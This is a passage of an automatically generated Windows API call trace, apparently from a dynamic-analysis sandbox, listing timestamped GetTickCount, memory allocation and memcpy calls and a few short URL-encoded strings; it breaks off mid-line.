[0100.650] GetTickCount () returned 0x210d27a [0100.651] GetTickCount () returned 0x210d27a [0100.653] GetTickCount () returned 0x210d27a [0100.655] GetTickCount () returned 0x210d27a [0100.656] GetTickCount () returned 0x210d27a [0100.658] malloc (_Size=0x28) returned 0x24ae13af500 [0100.659] malloc (_Size=0x28) returned 0x24ae13af470 [0100.659] malloc (_Size=0x28) returned 0x24ae13af3e0 [0100.660] realloc (_Block=0x0, _Size=0xa0) returned 0x24ae147ef20 [0100.660] memcpy (in: _Dst=0x24ae13ae060, _Src=0x24adf9bb5b8, _Size=0x14 | out: _Dst=0x24ae13ae060) returned 0x24ae13ae060 [0100.660] memcpy (in: _Dst=0x24adf9bb46e, _Src=0x24adf9b99a8, _Size=0x2 | out: _Dst=0x24adf9bb46e) returned 0x24adf9bb46e [0100.660] memcpy (in: _Dst=0x24adf9bb46c, _Src=0x24adf9b9448, _Size=0x2 | out: _Dst=0x24adf9bb46c) returned 0x24adf9bb46c [0100.660] memcpy (in: _Dst=0x24adf9bb46a, _Src=0x24adf9b9468, _Size=0x2 | out: _Dst=0x24adf9bb46a) returned 0x24adf9bb46a [0100.660] memcpy (in: _Dst=0x24adf9bb468, _Src=0x24adf9b98c8, _Size=0x2 | out: _Dst=0x24adf9bb468) returned 0x24adf9bb468 [0100.661] free (_Block=0x24ae13af3e0) [0100.661] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ù", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0100.661] memcpy (in: _Dst=0x24adf9b94c8, _Src=0xd6788fbb30, _Size=0x6 | out: _Dst=0x24adf9b94c8) returned 0x24adf9b94c8 [0100.661] malloc (_Size=0x28) returned 0x24ae13af200 [0100.661] memcpy (in: _Dst=0x24adf9bb49e, _Src=0x24ae1a0f69c, _Size=0xc | out: _Dst=0x24adf9bb49e) returned 0x24adf9bb49e [0100.661] memcpy (in: _Dst=0x24adf9bb498, _Src=0x24adf9b94c8, _Size=0x6 | out: _Dst=0x24adf9bb498) returned 0x24adf9bb498 [0100.661] free (_Block=0x24ae13af200) [0100.662] GetTickCount () returned 0x210d28a [0100.662] malloc (_Size=0x28) returned 0x24ae13af2c0 [0100.662] malloc (_Size=0x28) returned 0x24ae13af5f0 [0100.662] malloc (_Size=0x28) returned 0x24ae13af260 [0100.662] memcpy (in: _Dst=0x24adf9bb76e, _Src=0x24adf9b9928, _Size=0x2 | out: _Dst=0x24adf9bb76e) returned 0x24adf9bb76e [0100.662] memcpy (in: _Dst=0x24adf9bb76c, _Src=0x24adf9b9568, _Size=0x2 | out: _Dst=0x24adf9bb76c) returned 0x24adf9bb76c [0100.662] memcpy (in: _Dst=0x24adf9bb76a, _Src=0x24adf9b9748, _Size=0x2 | out: _Dst=0x24adf9bb76a) returned 0x24adf9bb76a [0100.662] memcpy (in: _Dst=0x24adf9bb768, _Src=0x24adf9b95e8, _Size=0x2 | out: _Dst=0x24adf9bb768) returned 0x24adf9bb768 [0100.663] free (_Block=0x24ae13af260) [0100.663] memcpy (in: _Dst=0x24adf9b9508, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b9508) returned 0x24adf9b9508 [0100.663] malloc (_Size=0x28) returned 0x24ae13af410 [0100.663] memcpy (in: _Dst=0x24adf9bb6ac, _Src=0x24adf9b9508, _Size=0x4 | out: _Dst=0x24adf9bb6ac) returned 0x24adf9bb6ac [0100.663] memcpy (in: _Dst=0x24adf9bb6a8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bb6a8) returned 0x24adf9bb6a8 [0100.664] free (_Block=0x24ae13af410) [0100.664] memcpy (in: _Dst=0x24adf9b9968, _Src=0x24adf9bb6ac, _Size=0x4 | out: _Dst=0x24adf9b9968) returned 0x24adf9b9968 [0100.664] malloc (_Size=0x28) returned 0x24ae13af3e0 [0100.664] memcpy (in: _Dst=0x24adf9b9ba8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b9ba8) returned 0x24adf9b9ba8 [0100.664] malloc (_Size=0x28) returned 0x24ae13af200 [0100.664] memcpy (in: _Dst=0x24adf9bb64c, _Src=0x24adf9b9ba8, _Size=0x4 | out: _Dst=0x24adf9bb64c) returned 0x24adf9bb64c [0100.664] memcpy (in: _Dst=0x24adf9bb648, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bb648) returned 0x24adf9bb648 [0100.664] free (_Block=0x24ae13af200) [0100.665] memcpy (in: _Dst=0x24adf9b9628, _Src=0x24adf9bb64c, _Size=0x4 | out: _Dst=0x24adf9b9628) returned 0x24adf9b9628 [0100.665] malloc (_Size=0x28) returned 0x24ae13af590 [0100.665] malloc (_Size=0x28) returned 0x24ae13af4d0 [0100.665] memcpy (in: _Dst=0x24adf9b9428, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b9428) returned 0x24adf9b9428 [0100.665] malloc (_Size=0x28) returned 0x24ae13aef30 [0100.665] memcpy (in: _Dst=0x24adf9bb79c, _Src=0x24adf9b9428, _Size=0x4 | out: _Dst=0x24adf9bb79c) returned 0x24adf9bb79c [0100.665] memcpy (in: _Dst=0x24adf9bb798, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bb798) returned 0x24adf9bb798 [0100.665] free (_Block=0x24ae13aef30) [0100.665] memcpy (in: _Dst=0x24adf9b9588, _Src=0x24adf9bb79c, _Size=0x4 | out: _Dst=0x24adf9b9588) returned 0x24adf9b9588 [0100.665] malloc (_Size=0x28) returned 0x24ae13af410 [0100.666] malloc (_Size=0x28) returned 0x24ae13aef30 [0100.666] memcpy (in: _Dst=0x24adf9b96a8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b96a8) returned 0x24adf9b96a8 [0100.666] malloc (_Size=0x28) returned 0x24ae13af0e0 [0100.666] memcpy (in: _Dst=0x24adf9bb9ac, _Src=0x24adf9b96a8, _Size=0x4 | out: _Dst=0x24adf9bb9ac) returned 0x24adf9bb9ac [0100.666] memcpy (in: _Dst=0x24adf9bb9a8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bb9a8) returned 0x24adf9bb9a8 [0100.666] free (_Block=0x24ae13af0e0) [0100.666] memcpy (in: _Dst=0x24adf9b98e8, _Src=0x24adf9bb9ac, _Size=0x4 | out: _Dst=0x24adf9b98e8) returned 0x24adf9b98e8 [0100.666] malloc (_Size=0x28) returned 0x24ae13af0e0 [0100.666] malloc (_Size=0x28) returned 0x24ae13aef60 [0100.667] GetTickCount () returned 0x210d28a [0100.667] memcpy (in: _Dst=0x24adf9ad84c, _Src=0x24adf9b98e8, _Size=0x4 | out: _Dst=0x24adf9ad84c) returned 0x24adf9ad84c [0100.667] memcpy (in: _Dst=0x24adf9ad84a, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ad84a) returned 0x24adf9ad84a [0100.667] memcpy (in: _Dst=0x24adf9ad846, _Src=0x24adf9b9588, _Size=0x4 | out: _Dst=0x24adf9ad846) returned 0x24adf9ad846 [0100.667] memcpy (in: _Dst=0x24adf9ad844, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ad844) returned 0x24adf9ad844 [0100.667] memcpy (in: _Dst=0x24adf9ad840, _Src=0x24adf9b9628, _Size=0x4 | out: _Dst=0x24adf9ad840) returned 0x24adf9ad840 [0100.667] memcpy (in: _Dst=0x24adf9ad83e, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ad83e) returned 0x24adf9ad83e [0100.667] memcpy (in: _Dst=0x24adf9ad83a, _Src=0x24adf9b9968, _Size=0x4 | out: _Dst=0x24adf9ad83a) returned 0x24adf9ad83a [0100.667] memcpy (in: _Dst=0x24adf9ad838, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ad838) returned 0x24adf9ad838 [0100.667] free (_Block=0x24ae13aef60) [0100.667] SysStringLen (param_1="%34%41%51%4d") returned 0xc [0100.668] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1480630 [0100.668] memcpy (in: _Dst=0x24adf9bb5e8, _Src=0x24ae1480630, _Size=0x8 | out: _Dst=0x24adf9bb5e8) returned 0x24adf9bb5e8 [0100.668] free (_Block=0x24ae1480630) [0100.668] memcpy (in: _Dst=0x24adf9b99e8, _Src=0xd6788fbb30, _Size=0x2 | out: _Dst=0x24adf9b99e8) returned 0x24adf9b99e8 [0100.668] malloc (_Size=0x28) returned 0x24ae13aefc0 [0100.669] memcpy (in: _Dst=0x24adf9bb67a, _Src=0x24ae1a0f69c, _Size=0xc | out: _Dst=0x24adf9bb67a) returned 0x24adf9bb67a [0100.669] memcpy (in: _Dst=0x24adf9bb678, _Src=0x24adf9b99e8, _Size=0x2 | out: _Dst=0x24adf9bb678) returned 0x24adf9bb678 [0100.669] free (_Block=0x24ae13aefc0) [0100.669] malloc (_Size=0x70) returned 0x24ae14703a0 [0100.670] malloc (_Size=0x28) returned 0x24ae13af440 [0100.670] malloc (_Size=0x28) returned 0x24ae13af320 [0100.670] malloc (_Size=0x28) returned 0x24ae13af4a0 [0100.670] memcpy (in: _Dst=0x24adf9bb58e, _Src=0x24adf9b95a8, _Size=0x2 | out: _Dst=0x24adf9bb58e) returned 0x24adf9bb58e [0100.670] memcpy (in: _Dst=0x24adf9bb58c, _Src=0x24adf9b9768, _Size=0x2 | out: _Dst=0x24adf9bb58c) returned 0x24adf9bb58c [0100.670] memcpy (in: _Dst=0x24adf9bb58a, _Src=0x24adf9b9528, _Size=0x2 | out: _Dst=0x24adf9bb58a) returned 0x24adf9bb58a [0100.670] memcpy (in: _Dst=0x24adf9bb588, _Src=0x24adf9b9848, _Size=0x2 | out: _Dst=0x24adf9bb588) returned 0x24adf9bb588 [0100.671] free (_Block=0x24ae13af4a0) [0100.671] memcpy (in: _Dst=0x24adf9b9648, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9b9648) returned 0x24adf9b9648 [0100.671] malloc (_Size=0x28) returned 0x24ae13af110 [0100.671] memcpy (in: _Dst=0x24adf9bb70c, _Src=0x24adf9b9648, _Size=0x4 | out: _Dst=0x24adf9bb70c) returned 0x24adf9bb70c [0100.671] memcpy (in: _Dst=0x24adf9bb708, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bb708) returned 0x24adf9bb708 [0100.671] free (_Block=0x24ae13af110) [0100.672] memcpy (in: _Dst=0x24adf9b96c8, _Src=0x24adf9bb70c, _Size=0x4 | out: _Dst=0x24adf9b96c8) returned 0x24adf9b96c8 [0100.672] malloc (_Size=0x28) returned 0x24ae13aef60 [0100.672] memcpy (in: _Dst=0x24adf9b9788, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9b9788) returned 0x24adf9b9788 [0100.672] malloc (_Size=0x28) returned 0x24ae13af530 [0100.672] memcpy (in: _Dst=0x24adf9bba0c, _Src=0x24adf9b9788, _Size=0x4 | out: _Dst=0x24adf9bba0c) returned 0x24adf9bba0c [0100.672] memcpy (in: _Dst=0x24adf9bba08, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bba08) returned 0x24adf9bba08 [0100.672] free (_Block=0x24ae13af530) [0100.672] memcpy (in: _Dst=0x24adf9b9b48, _Src=0x24adf9bba0c, _Size=0x4 | out: _Dst=0x24adf9b9b48) returned 0x24adf9b9b48 [0100.672] malloc (_Size=0x28) returned 0x24ae13af5c0 [0100.673] malloc (_Size=0x28) returned 0x24ae13af1d0 [0100.673] memcpy (in: _Dst=0x24adf9b9948, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9b9948) returned 0x24adf9b9948 [0100.673] malloc (_Size=0x28) returned 0x24ae13af530 [0100.673] memcpy (in: _Dst=0x24adf9bba3c, _Src=0x24adf9b9948, _Size=0x4 | out: _Dst=0x24adf9bba3c) returned 0x24adf9bba3c [0100.673] memcpy (in: _Dst=0x24adf9bba38, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bba38) returned 0x24adf9bba38 [0100.673] free (_Block=0x24ae13af530) [0100.673] memcpy (in: _Dst=0x24adf9b97a8, _Src=0x24adf9bba3c, _Size=0x4 | out: _Dst=0x24adf9b97a8) returned 0x24adf9b97a8 [0100.673] malloc (_Size=0x28) returned 0x24ae13af530 [0100.673] malloc (_Size=0x28) returned 0x24ae13af560 [0100.674] memcpy (in: _Dst=0x24adf9b9668, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9b9668) returned 0x24adf9b9668 [0100.674] malloc (_Size=0x28) returned 0x24ae13af4a0 [0100.674] memcpy (in: _Dst=0x24adf9bba6c, _Src=0x24adf9b9668, _Size=0x4 | out: _Dst=0x24adf9bba6c) returned 0x24adf9bba6c [0100.674] memcpy (in: _Dst=0x24adf9bba68, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bba68) returned 0x24adf9bba68 [0100.674] free (_Block=0x24ae13af4a0) [0100.674] memcpy (in: _Dst=0x24adf9b9548, _Src=0x24adf9bba6c, _Size=0x4 | out: _Dst=0x24adf9b9548) returned 0x24adf9b9548 [0100.674] malloc (_Size=0x28) returned 0x24ae13af650 [0100.674] malloc (_Size=0x28) returned 0x24ae13af110 [0100.675] memcpy (in: _Dst=0x24adf9a597c, _Src=0x24adf9b9548, _Size=0x4 | out: _Dst=0x24adf9a597c) returned 0x24adf9a597c [0100.675] memcpy (in: _Dst=0x24adf9a597a, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a597a) returned 0x24adf9a597a [0100.675] memcpy (in: _Dst=0x24adf9a5976, _Src=0x24adf9b97a8, _Size=0x4 | out: _Dst=0x24adf9a5976) returned 0x24adf9a5976 [0100.675] memcpy (in: _Dst=0x24adf9a5974, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5974) returned 0x24adf9a5974 [0100.675] memcpy (in: _Dst=0x24adf9a5970, _Src=0x24adf9b9b48, _Size=0x4 | out: _Dst=0x24adf9a5970) returned 0x24adf9a5970 [0100.675] memcpy (in: _Dst=0x24adf9a596e, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a596e) returned 0x24adf9a596e [0100.675] memcpy (in: _Dst=0x24adf9a596a, _Src=0x24adf9b96c8, _Size=0x4 | out: _Dst=0x24adf9a596a) returned 0x24adf9a596a [0100.675] memcpy (in: _Dst=0x24adf9a5968, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5968) returned 0x24adf9a5968 [0100.675] free (_Block=0x24ae13af110) [0100.675] SysStringLen (param_1="%30%7c%35%7c") returned 0xc [0100.675] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1480630 [0100.676] memcpy (in: _Dst=0x24adf9bba98, _Src=0x24ae1480630, _Size=0x8 | out: _Dst=0x24adf9bba98) returned 0x24adf9bba98 [0100.676] free (_Block=0x24ae1480630) [0100.676] malloc (_Size=0x2e0) returned 0x24ae1394b30 [0100.676] malloc (_Size=0x20) returned 0x24ae13af200 [0100.676] malloc (_Size=0x288) returned 0x24ae148e270 [0100.676] realloc (_Block=0x0, _Size=0x140) returned 0x24ae139d390 [0100.676] GetTickCount () returned 0x210d299 [0100.677] realloc (_Block=0x24ae13af200, _Size=0x40) returned 0x24ae146c320 [0100.677] realloc (_Block=0x24ae139d390, _Size=0x280) returned 0x24ae148d080 [0100.677] GetTickCount () returned 0x210d299 [0100.677] malloc (_Size=0x508) returned 0x24ae1486a00 [0100.677] realloc (_Block=0x24ae146c320, _Size=0x80) returned 0x24ae1480630 [0100.677] GetTickCount () returned 0x210d299 [0100.677] realloc (_Block=0x24ae148d080, _Size=0x500) returned 0x24ae1487930 [0100.677] GetTickCount () returned 0x210d299 [0100.677] GetTickCount () returned 0x210d299 [0100.677] malloc (_Size=0xa08) returned 0x24ae13b1f80 [0100.677] realloc (_Block=0x24ae1480630, _Size=0x100) returned 0x24ae1480630 [0100.677] GetTickCount () returned 0x210d299 [0100.677] GetTickCount () returned 0x210d299 [0100.677] realloc (_Block=0x24ae1487930, _Size=0xa00) returned 0x24ae13b1570 [0100.678] GetTickCount () returned 0x210d299 [0100.678] GetTickCount () returned 0x210d299 [0100.678] GetTickCount () returned 0x210d299 [0100.678] GetTickCount () returned 0x210d299 [0100.678] malloc (_Size=0x1408) returned 0x24ae139eed0 [0100.678] realloc (_Block=0x24ae1480630, _Size=0x200) returned 0x24ae148eb20 [0100.679] GetTickCount () returned 0x210d299 [0100.679] GetTickCount () returned 0x210d299 [0100.679] GetTickCount () returned 0x210d299 [0100.679] realloc (_Block=0x24ae13b1570, _Size=0x1400) returned 0x24ae13a02e0 [0100.679] GetTickCount () returned 0x210d299 [0100.679] GetTickCount () returned 0x210d299 [0100.679] GetTickCount () returned 0x210d299 [0100.679] GetTickCount () returned 0x210d299 [0100.679] GetTickCount () returned 0x210d299 [0100.679] GetTickCount () returned 0x210d299 [0100.679] GetTickCount () returned 0x210d299 [0100.679] GetTickCount () returned 0x210d299 [0100.679] GetTickCount () returned 0x210d299 [0100.679] malloc (_Size=0x2808) returned 0x24ae13a16f0 [0100.680] GetTickCount () returned 0x210d299 [0100.682] GetTickCount () returned 0x210d299 [0100.683] GetTickCount () returned 0x210d299 [0100.685] GetTickCount () returned 0x210d299 [0100.687] GetTickCount () returned 0x210d299 [0100.689] GetTickCount () returned 0x210d299 [0100.691] GetTickCount () returned 0x210d2a9 [0100.693] GetTickCount () returned 0x210d2a9 [0100.695] GetTickCount () returned 0x210d2a9 [0100.696] GetTickCount () returned 0x210d2a9 [0100.698] GetTickCount () returned 0x210d2a9 [0100.699] GetTickCount () returned 0x210d2a9 [0100.701] malloc (_Size=0x28) returned 0x24ae13af620 [0100.701] malloc (_Size=0x28) returned 0x24ae13af4a0 [0100.701] malloc (_Size=0x28) returned 0x24ae13af680 [0100.701] memcpy (in: _Dst=0x24adf9bb73e, _Src=0x24adf9b96e8, _Size=0x2 | out: _Dst=0x24adf9bb73e) returned 0x24adf9bb73e [0100.702] memcpy (in: _Dst=0x24adf9bb73c, _Src=0x24adf9b9aa8, _Size=0x2 | out: _Dst=0x24adf9bb73c) returned 0x24adf9bb73c [0100.702] memcpy (in: _Dst=0x24adf9bb73a, _Src=0x24adf9b9a48, _Size=0x2 | out: _Dst=0x24adf9bb73a) returned 0x24adf9bb73a [0100.702] memcpy (in: _Dst=0x24adf9bb738, _Src=0x24adf9b97c8, _Size=0x2 | out: _Dst=0x24adf9bb738) returned 0x24adf9bb738 [0100.702] free (_Block=0x24ae13af680) [0100.702] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x8f", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0100.703] memcpy (in: _Dst=0x24adf9b9b68, _Src=0xd6788fbb30, _Size=0x4 | out: _Dst=0x24adf9b9b68) returned 0x24adf9b9b68 [0100.703] malloc (_Size=0x28) returned 0x24ae13af680 [0100.703] memcpy (in: _Dst=0x24adf9bbacc, _Src=0x24ae1a0f69c, _Size=0xc | out: _Dst=0x24adf9bbacc) returned 0x24adf9bbacc [0100.703] memcpy (in: _Dst=0x24adf9bbac8, _Src=0x24adf9b9b68, _Size=0x4 | out: _Dst=0x24adf9bbac8) returned 0x24adf9bbac8 [0100.704] free (_Block=0x24ae13af680) [0100.704] malloc (_Size=0x70) returned 0x24ae146f820 [0100.704] GetTickCount () returned 0x210d2a9 [0100.704] malloc (_Size=0x28) returned 0x24ae13af680 [0100.704] malloc (_Size=0x28) returned 0x24ae13af6b0 [0100.705] malloc (_Size=0x28) returned 0x24ae13aeff0 [0100.705] malloc (_Size=0x28) returned 0x24ae13af260 [0100.705] memcpy (in: _Dst=0x24adf9bb500, _Src=0x24adf9b9b28, _Size=0x2 | out: _Dst=0x24adf9bb500) returned 0x24adf9bb500 [0100.705] memcpy (in: _Dst=0x24adf9bb4fe, _Src=0x24adf9b9908, _Size=0x2 | out: _Dst=0x24adf9bb4fe) returned 0x24adf9bb4fe [0100.705] memcpy (in: _Dst=0x24adf9bb4fc, _Src=0x24adf9b9a68, _Size=0x2 | out: _Dst=0x24adf9bb4fc) returned 0x24adf9bb4fc [0100.705] memcpy (in: _Dst=0x24adf9bb4fa, _Src=0x24adf9b95c8, _Size=0x2 | out: _Dst=0x24adf9bb4fa) returned 0x24adf9bb4fa [0100.705] memcpy (in: _Dst=0x24adf9bb4f8, _Src=0x24adf9b9a28, _Size=0x2 | out: _Dst=0x24adf9bb4f8) returned 0x24adf9bb4f8 [0100.706] free (_Block=0x24ae13af260) [0100.706] memcpy (in: _Dst=0x24adf9b9ae8, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9b9ae8) returned 0x24adf9b9ae8 [0100.706] malloc (_Size=0x28) returned 0x24ae13af200 [0100.706] memcpy (in: _Dst=0x24adf9bbafc, _Src=0x24adf9b9ae8, _Size=0x4 | out: _Dst=0x24adf9bbafc) returned 0x24adf9bbafc [0100.706] memcpy (in: _Dst=0x24adf9bbaf8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bbaf8) returned 0x24adf9bbaf8 [0100.707] free (_Block=0x24ae13af200) [0100.707] memcpy (in: _Dst=0x24adf9bbe78, _Src=0x24adf9bbafc, _Size=0x4 | out: _Dst=0x24adf9bbe78) returned 0x24adf9bbe78 [0100.707] malloc (_Size=0x28) returned 0x24ae13af080 [0100.707] memcpy (in: _Dst=0x24adf9bc3f8, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9bc3f8) returned 0x24adf9bc3f8 [0100.707] malloc (_Size=0x28) returned 0x24ae13aef90 [0100.707] memcpy (in: _Dst=0x24adf9bbb2c, _Src=0x24adf9bc3f8, _Size=0x4 | out: _Dst=0x24adf9bbb2c) returned 0x24adf9bbb2c [0100.707] memcpy (in: _Dst=0x24adf9bbb28, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bbb28) returned 0x24adf9bbb28 [0100.708] free (_Block=0x24ae13aef90) [0100.708] memcpy (in: _Dst=0x24adf9bc0d8, _Src=0x24adf9bbb2c, _Size=0x4 | out: _Dst=0x24adf9bc0d8) returned 0x24adf9bc0d8 [0100.708] malloc (_Size=0x28) returned 0x24ae13aef90 [0100.708] malloc (_Size=0x28) returned 0x24ae13aefc0 [0100.708] memcpy (in: _Dst=0x24adf9bc2d8, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9bc2d8) returned 0x24adf9bc2d8 [0100.708] malloc (_Size=0x28) returned 0x24ae13af0b0 [0100.708] memcpy (in: _Dst=0x24adf9bbbbc, _Src=0x24adf9bc2d8, _Size=0x4 | out: _Dst=0x24adf9bbbbc) returned 0x24adf9bbbbc [0100.708] memcpy (in: _Dst=0x24adf9bbbb8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bbbb8) returned 0x24adf9bbbb8 [0100.709] free (_Block=0x24ae13af0b0) [0100.709] memcpy (in: _Dst=0x24adf9bbef8, _Src=0x24adf9bbbbc, _Size=0x4 | out: _Dst=0x24adf9bbef8) returned 0x24adf9bbef8 [0100.709] malloc (_Size=0x28) returned 0x24ae13af0b0 [0100.709] malloc (_Size=0x28) returned 0x24ae13af110 [0100.709] memcpy (in: _Dst=0x24adf9bc058, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9bc058) returned 0x24adf9bc058 [0100.709] malloc (_Size=0x28) returned 0x24ae13af140 [0100.710] memcpy (in: _Dst=0x24adf9bbb8c, _Src=0x24adf9bc058, _Size=0x4 | out: _Dst=0x24adf9bbb8c) returned 0x24adf9bbb8c [0100.710] memcpy (in: _Dst=0x24adf9bbb88, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bbb88) returned 0x24adf9bbb88 [0100.710] free (_Block=0x24ae13af140) [0100.710] memcpy (in: _Dst=0x24adf9bc318, _Src=0x24adf9bbb8c, _Size=0x4 | out: _Dst=0x24adf9bc318) returned 0x24adf9bc318 [0100.710] malloc (_Size=0x28) returned 0x24ae13af200 [0100.710] malloc (_Size=0x28) returned 0x24ae13af140 [0100.711] memcpy (in: _Dst=0x24adf9bbd78, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9bbd78) returned 0x24adf9bbd78 [0100.711] malloc (_Size=0x28) returned 0x24ae13af170 [0100.711] memcpy (in: _Dst=0x24adf9bb52c, _Src=0x24adf9bbd78, _Size=0x4 | out: _Dst=0x24adf9bb52c) returned 0x24adf9bb52c [0100.711] memcpy (in: _Dst=0x24adf9bb528, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bb528) returned 0x24adf9bb528 [0100.711] free (_Block=0x24ae13af170) [0100.711] memcpy (in: _Dst=0x24adf9bbdf8, _Src=0x24adf9bb52c, _Size=0x4 | out: _Dst=0x24adf9bbdf8) returned 0x24adf9bbdf8 [0100.711] malloc (_Size=0x28) returned 0x24ae13af230 [0100.712] malloc (_Size=0x28) returned 0x24ae13af170 [0100.712] GetTickCount () returned 0x210d2b9 [0100.712] memcpy (in: _Dst=0x24adf9a6242, _Src=0x24adf9bbdf8, _Size=0x4 | out: _Dst=0x24adf9a6242) returned 0x24adf9a6242 [0100.712] memcpy (in: _Dst=0x24adf9a6240, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a6240) returned 0x24adf9a6240 [0100.712] memcpy (in: _Dst=0x24adf9a623c, _Src=0x24adf9bc318, _Size=0x4 | out: _Dst=0x24adf9a623c) returned 0x24adf9a623c [0100.712] memcpy (in: _Dst=0x24adf9a623a, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a623a) returned 0x24adf9a623a [0100.712] memcpy (in: _Dst=0x24adf9a6236, _Src=0x24adf9bbef8, _Size=0x4 | out: _Dst=0x24adf9a6236) returned 0x24adf9a6236 [0100.712] memcpy (in: _Dst=0x24adf9a6234, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a6234) returned 0x24adf9a6234 [0100.712] memcpy (in: _Dst=0x24adf9a6230, _Src=0x24adf9bc0d8, _Size=0x4 | out: _Dst=0x24adf9a6230) returned 0x24adf9a6230 [0100.712] memcpy (in: _Dst=0x24adf9a622e, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a622e) returned 0x24adf9a622e [0100.712] memcpy (in: _Dst=0x24adf9a622a, _Src=0x24adf9bbe78, _Size=0x4 | out: _Dst=0x24adf9a622a) returned 0x24adf9a622a [0100.712] memcpy (in: _Dst=0x24adf9a6228, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a6228) returned 0x24adf9a6228 [0100.712] free (_Block=0x24ae13af170) [0100.712] SysStringLen (param_1="%c3%b8%61%45%41") returned 0xf [0100.713] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1480630 [0100.713] memcpy (in: _Dst=0x24adf9bb7f8, _Src=0x24ae1480630, _Size=0x8 | out: _Dst=0x24adf9bb7f8) returned 0x24adf9bb7f8 [0100.713] free (_Block=0x24ae1480630) [0100.713] malloc (_Size=0x2e0) returned 0x24ae1484730 [0100.713] malloc (_Size=0x20) returned 0x24ae13af170 [0100.713] malloc (_Size=0x288) returned 0x24ae148dfe0 [0100.713] realloc (_Block=0x0, _Size=0x140) returned 0x24ae139d0f0 [0100.713] realloc (_Block=0x24ae13af170, _Size=0x40) returned 0x24ae146c320 [0100.713] GetTickCount () returned 0x210d2b9 [0100.713] realloc (_Block=0x24ae139d0f0, _Size=0x280) returned 0x24ae148d5a0 [0100.713] malloc (_Size=0x508) returned 0x24ae1487930 [0100.714] GetTickCount () returned 0x210d2b9 [0100.714] realloc (_Block=0x24ae146c320, _Size=0x80) returned 0x24ae13a3f00 [0100.714] realloc (_Block=0x24ae148d5a0, _Size=0x500) returned 0x24ae1485ad0 [0100.714] GetTickCount () returned 0x210d2b9 [0100.714] GetTickCount () returned 0x210d2b9 [0100.714] malloc (_Size=0xa08) returned 0x24ae13af740 [0100.714] GetTickCount () returned 0x210d2b9 [0100.714] realloc (_Block=0x24ae13a3f00, _Size=0x100) returned 0x24ae1480630 [0100.714] GetTickCount () returned 0x210d2b9 [0100.714] realloc (_Block=0x24ae1485ad0, _Size=0xa00) returned 0x24ae13b51d0 [0100.714] GetTickCount () returned 0x210d2b9 [0100.714] GetTickCount () returned 0x210d2b9 [0100.714] GetTickCount () returned 0x210d2b9 [0100.714] GetTickCount () returned 0x210d2b9 [0100.714] malloc (_Size=0x1408) returned 0x24ae13957b0 [0100.715] GetTickCount () returned 0x210d2b9 [0100.715] realloc (_Block=0x24ae1480630, _Size=0x200) returned 0x24ae148ed30 [0100.715] GetTickCount () returned 0x210d2b9 [0100.715] GetTickCount () returned 0x210d2b9 [0100.715] GetTickCount () returned 0x210d2b9 [0100.715] realloc (_Block=0x24ae13b51d0, _Size=0x1400) returned 0x24ae1396bc0 [0100.715] GetTickCount () returned 0x210d2b9 [0100.715] GetTickCount () returned 0x210d2b9 [0100.715] GetTickCount () returned 0x210d2b9 [0100.715] GetTickCount () returned 0x210d2b9 [0100.715] GetTickCount () returned 0x210d2b9 [0100.715] GetTickCount () returned 0x210d2b9 [0100.716] GetTickCount () returned 0x210d2b9 [0100.716] GetTickCount () returned 0x210d2b9 [0100.716] malloc (_Size=0x2808) returned 0x24ae1397fd0 [0100.716] GetTickCount () returned 0x210d2b9 [0100.717] GetTickCount () returned 0x210d2b9 [0100.719] GetTickCount () returned 0x210d2b9 [0100.720] GetTickCount () returned 0x210d2b9 [0100.722] GetTickCount () returned 0x210d2c8 [0100.724] GetTickCount () returned 